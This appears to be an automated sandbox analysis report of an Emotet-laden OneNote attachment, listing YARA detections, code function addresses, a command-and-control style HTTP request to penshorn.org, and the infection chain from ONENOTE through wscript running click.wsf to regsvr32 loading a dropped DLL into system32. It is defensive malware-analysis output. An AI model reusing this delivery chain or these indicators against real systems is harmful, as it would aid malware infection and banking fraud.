                    Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                    Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49696 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49700 version: TLS 1.2

                    E-Banking Fraud

                    barindex
                    Yara detected Emotet
                    Source: Yara matchFile source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 3.2.regsvr32.exe.1290000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.c30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.1290000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.884606012.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.382454189.0000000001290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.885272914.0000000002521000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\JURwocL\Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800068183_2_0000000180006818
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8783_2_000000018000B878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800071103_2_0000000180007110
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D283_2_0000000180008D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800145553_2_0000000180014555
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00ED00003_2_00ED0000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E263C3_2_028E263C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E8BC83_2_028E8BC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F8FC83_2_028F8FC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F709C3_2_028F709C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FA0003_2_028FA000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028ECC143_2_028ECC14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E7D6C3_2_028E7D6C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E8A8C3_2_028E8A8C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_02904E8C3_2_02904E8C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EBE903_2_028EBE90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F4A903_2_028F4A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E3ABC3_2_028E3ABC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FA6BC3_2_028FA6BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EAAB83_2_028EAAB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E4EB83_2_028E4EB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028ED6CC3_2_028ED6CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FEAC03_2_028FEAC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F96D43_2_028F96D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E92F03_2_028E92F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E3E0C3_2_028E3E0C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F020C3_2_028F020C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F8E083_2_028F8E08
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F5A003_2_028F5A00
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_02908A003_2_02908A00
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E461C3_2_028E461C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E42143_2_028E4214
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EBA2C3_2_028EBA2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F8A2C3_2_028F8A2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F0E2C3_2_028F0E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F662C3_2_028F662C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FA2443_2_028FA244
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EF65C3_2_028EF65C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EB2583_2_028EB258
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EA6603_2_028EA660
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E32743_2_028E3274
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F0A703_2_028F0A70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F53843_2_028F5384
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E1B943_2_028E1B94
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EDBA03_2_028EDBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EFFB83_2_028EFFB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F8BB83_2_028F8BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E8FB03_2_028E8FB0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F97CC3_2_028F97CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E2FD43_2_028E2FD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E33D43_2_028E33D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F3FD03_2_028F3FD0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_029027EC3_2_029027EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EA7F03_2_028EA7F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F4F183_2_028F4F18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EEF143_2_028EEF14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F3B143_2_028F3B14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FE3103_2_028FE310
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028ED33C3_2_028ED33C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E975C3_2_028E975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E47583_2_028E4758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FE7503_2_028FE750
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EF77C3_2_028EF77C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E83783_2_028E8378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FD7703_2_028FD770
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FCF703_2_028FCF70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E4C843_2_028E4C84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FCC843_2_028FCC84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F58803_2_028F5880
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EAC943_2_028EAC94
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E98AC3_2_028E98AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_029094BC3_2_029094BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EDCB83_2_028EDCB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FA8B03_2_028FA8B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E80CC3_2_028E80CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F08CC3_2_028F08CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EF8C43_2_028EF8C4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F5CC43_2_028F5CC4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E18DC3_2_028E18DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E14D43_2_028E14D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F3CD43_2_028F3CD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F20E03_2_028F20E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E48FC3_2_028E48FC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E90F83_2_028E90F8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E3CF43_2_028E3CF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E94083_2_028E9408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E7C083_2_028E7C08
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0290181C3_2_0290181C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E10003_2_028E1000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EB83C3_2_028EB83C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F10303_2_028F1030
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FEC303_2_028FEC30
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_029054503_2_02905450
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FC44C3_2_028FC44C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E78403_2_028E7840
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FC0583_2_028FC058
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FB4603_2_028FB460
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EB07C3_2_028EB07C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E2C783_2_028E2C78
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EC0783_2_028EC078
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028ED4743_2_028ED474
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F6C703_2_028F6C70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FBDA03_2_028FBDA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E95BC3_2_028E95BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F15C83_2_028F15C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FD5F03_2_028FD5F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_029099103_2_02909910
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F610C3_2_028F610C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_029085003_2_02908500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F75183_2_028F7518
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FAD283_2_028FAD28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F19243_2_028F1924
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F4D203_2_028F4D20
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E61383_2_028E6138
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E75303_2_028E7530
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FB1303_2_028FB130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00C200004_2_00C20000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02526E424_2_02526E42
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025406184_2_02540618
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02529B794_2_02529B79
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02533FD04_2_02533FD0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02528BC84_2_02528BC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02538FC84_2_02538FC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025263F44_2_025263F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025473A44_2_025473A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252CC144_2_0252CC14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252640A4_2_0252640A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025308CC4_2_025308CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02527D6C4_2_02527D6C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252B2584_2_0252B258
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252F65C4_2_0252F65C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253A2444_2_0253A244
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02546E484_2_02546E48
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02530A704_2_02530A70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025232744_2_02523274
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252A6604_2_0252A660
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025242144_2_02524214
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252461C4_2_0252461C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02535A004_2_02535A00
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02548A004_2_02548A00
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02538E084_2_02538E08
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02523E0C4_2_02523E0C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253020C4_2_0253020C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252263C4_2_0252263C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252BA2C4_2_0252BA2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02538A2C4_2_02538A2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02530E2C4_2_02530E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253662C4_2_0253662C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025396D44_2_025396D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253EAC04_2_0253EAC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252D6CC4_2_0252D6CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025292F04_2_025292F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025436FC4_2_025436FC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252BE904_2_0252BE90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02534A904_2_02534A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02542E844_2_02542E84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02544E8C4_2_02544E8C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02528A8C4_2_02528A8C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02542AB04_2_02542AB0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252AAB84_2_0252AAB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02524EB84_2_02524EB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02537EBE4_2_02537EBE
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02523ABC4_2_02523ABC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253A6BC4_2_0253A6BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253E7504_2_0253E750
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025247584_2_02524758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252975C4_2_0252975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253D7704_2_0253D770
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253CF704_2_0253CF70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025283784_2_02528378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252F77C4_2_0252F77C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02548B684_2_02548B68
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253E3104_2_0253E310
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025483104_2_02548310
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252EF144_2_0252EF14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02533B144_2_02533B14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02545B1C4_2_02545B1C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02534F184_2_02534F18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252D33C4_2_0252D33C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02522FD44_2_02522FD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025233D44_2_025233D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025397CC4_2_025397CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252A7F04_2_0252A7F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253FFFC4_2_0253FFFC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025427EC4_2_025427EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02521B944_2_02521B94
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253779A4_2_0253779A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025353844_2_02535384
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02528FB04_2_02528FB0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252FFB84_2_0252FFB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02538BB84_2_02538BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252DBA04_2_0252DBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025447A84_2_025447A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025454504_2_02545450
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253C0584_2_0253C058
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025278404_2_02527840
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253C44C4_2_0253C44C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02536C704_2_02536C70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252D4744_2_0252D474
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02522C784_2_02522C78
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252C0784_2_0252C078
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252B07C4_2_0252B07C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253B4604_2_0253B460
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025458684_2_02545868
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025274104_2_02527410
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0254181C4_2_0254181C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025210004_2_02521000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253A0004_2_0253A000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025294084_2_02529408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02527C084_2_02527C08
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025310304_2_02531030
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253EC304_2_0253EC30
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252B83C4_2_0252B83C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02541CD44_2_02541CD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025214D44_2_025214D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02533CD44_2_02533CD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025218DC4_2_025218DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252F8C44_2_0252F8C4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02535CC44_2_02535CC4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025280CC4_2_025280CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02523CF44_2_02523CF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025290F84_2_025290F8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025248FC4_2_025248FC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025320E04_2_025320E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025414944_2_02541494
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252AC944_2_0252AC94
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253709C4_2_0253709C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025358804_2_02535880
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02524C844_2_02524C84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253CC844_2_0253CC84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0254488C4_2_0254488C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253A8B04_2_0253A8B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025494BC4_2_025494BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0252DCB84_2_0252DCB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025444A84_2_025444A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025298AC4_2_025298AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02544D644_2_02544D64
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025499104_2_02549910
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025375184_2_02537518
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025485004_2_02548500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025421004_2_02542100
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253610C4_2_0253610C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253B1304_2_0253B130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025261384_2_02526138
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02534D204_2_02534D20
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025319244_2_02531924
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253AD284_2_0253AD28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025315C84_2_025315C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253D5F04_2_0253D5F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_025295BC4_2_025295BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253BDA04_2_0253BDA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,3_2_0000000180010C10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,3_2_0000000180010AC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,3_2_0000000180010DB0
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                    Source: iMedPub_LTD_6.oneReversingLabs: Detection: 30%
                    Source: iMedPub_LTD_6.oneVirustotal: Detection: 40%
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_6.one
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll"
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JURwocL\wAXwf.dll"
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsrJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll"Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JURwocL\wAXwf.dll"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
                    Source: Send to OneNote.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{C7A88BE3-9A9F-418C-B394-3F1FA3D28273}Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{3B180607-2A0E-43AC-B02B-544D2B7818E6} - OProcSessId.datJump to behavior
                    Source: classification engineClassification label: mal100.troj.expl.evad.winONE@11/430@1/49
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E8BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,3_2_028E8BC8
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEMutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
